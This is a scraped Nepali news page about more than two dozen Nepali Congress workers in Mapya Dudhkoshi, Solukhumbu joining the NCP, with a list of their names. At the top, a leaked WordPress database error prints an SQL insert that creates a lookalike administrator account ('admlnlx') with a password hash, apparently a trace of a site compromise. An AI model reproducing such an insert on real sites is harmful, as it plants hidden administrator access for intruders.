WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQK4BWD72Lq0gFIFXlexr0PBekdLBF.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 15:12:12', '', 'admlnlx', 'admlnlx')

माप्यमा काङ्ग्रेस परित्याग गरी दुई दर्जन भन्दा बढी कार्यकता नेकपा प्रबेश – Gaule Khabar

माप्यमा काङ्ग्रेस परित्याग गरी दुई दर्जन भन्दा बढी कार्यकता नेकपा प्रबेश

माप्यमा काङ्ग्रेस परित्याग गरी दुई दर्जन भन्दा बढी कार्यकता नेकपा प्रबेश

गाउँले न्युज, सोलुखुम्बु । माप्य दुधकोशी गाउँपालिका वडा न ६ र ७ मा नेपाल कम्युनिस्ट पार्टी (नेकपा)को वडा इकाई कमिटिको सपथ ग्रहण, प्रशिक्षण र प्रथम पूर्ण बैठक भब्यताका साथ सम्पन भएको छ ।पौष १ र २ गते माप्य दुधकोशी गाउँपालिका ६ र ७ वाकुमा आयोजित उक्त कार्यक्रममा नेपाली काङ्ग्रेसका दुई दर्जन भन्दा बढी कार्यकर्ताले पार्टी परीत्याग गरी नेपाल कम्युनिस्ट पार्टी (नेकपा) प्रबेश गरेका छन ।कार्यक्रममा नेपाली काङ्ग्रेस परीत्याग गरी नेकपा प्रबेश गर्ने नव प्रवेशी कार्यकतालाई नेपाल कम्युनिस्ट पार्टी नेकपा जिल्ला अध्यक्ष मानबिर राई, नेकपाका जिल्ला सचिब कर्ज्याङ (गोम्बु) शेर्पा, नेकपाका जिल्ला सदस्य तथा माप्य दुधकोशी गाउपालिका अध्यक्ष बुद्विकिरण राई, प्रदेश न १ निवाचन क्षेत्र ख सोलुखुम्बुका सचिब आस कुमार राई (शिसिर), नेकपा जिल्ला सदस्य तथा माप्य दुधकोशी गाउँपालिका नेकपा अध्यक्ष गौरब राई, नेकपा जिल्ला सदस्या तथा माप्य दुधकोशी गाउँपालिका उपाध्यक्ष जुनिता माया मगर लगायत अन्य उपस्थित नेताहरुले अबिर र खादा लगाएर स्वगत गर्नुभयो ।

नेपाली काङग्रेस परीत्या गरी नेकपा प्रबेश गर्नेहरुको नामवली
१ नवल सिह राई
२ उज्जल राई
३ पदमवति राउत (राई)
४ गोपाल प्रसाद घिमिरे
५ शान्त घिमिरे
६ सुजन बुढाथोकी मगर
७ रामकुमार बुर्जा मगर
८ याम बहादुर रजान मगर
९ ढाका कुमारी घिमिरे
१० निरकुमार नेपालि
११ रहरमान (टम्बर बहादुर) नेपालि
१२ ललित श्रेष्ठ
१३ गोपाल नेपाली
१४ धन कुमारी घिमिरे
१५ गोपाल बुढाथोकी मगर
१६ नरजित राई (दिमरा)
१७ तुल बहादुर बिक
१८ कबिध राई
१९ सागर राई
२० चन्द्र बहादुर राई
२१ रमेश राई
२२ लालमाया राई
२३ देउ बहादुर राई
२४ आङ दावा बिक
२५ दिकपाल बिक
२६ नौ बहादुर बिक
२७ कुमारी बिक
२८ कल्पना बिक
२९ लेख बहादुर बिक

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका